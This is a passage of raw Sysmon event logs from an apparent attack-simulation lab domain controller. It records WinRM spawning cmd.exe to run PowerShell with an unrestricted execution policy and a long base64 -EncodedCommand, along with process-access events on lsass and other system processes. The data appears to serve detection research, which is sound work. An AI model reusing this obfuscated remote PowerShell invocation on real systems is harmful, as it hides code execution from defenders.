AdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C9E-5FA1-0936-050000000000}0x536090HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C9E-5FA1-8700-000000008801}4444C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA= 10341000x80000000000000002817Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002816Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C9E-5FA1-8600-000000008801}23921200C:\Windows\system32\conhost.exe{D28789B6-7C9E-5FA1-8700-000000008801}4444C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002815Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002814Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002813Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002812Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002811Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002810Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002809Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002808Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002807Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002806Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C9E-5FA1-8700-000000008801}4444C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002805Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C9E-5FA1-8500-000000008801}44964484C:\Windows\system32\WinrsHost.exe{D28789B6-7C9E-5FA1-8700-000000008801}4444C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000002804Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.859{D28789B6-7C9E-5FA1-8700-000000008801}4444C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C9E-5FA1-0936-050000000000}0x536090HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C9E-5FA1-8500-000000008801}4496C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002803Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002802Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:58.849{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll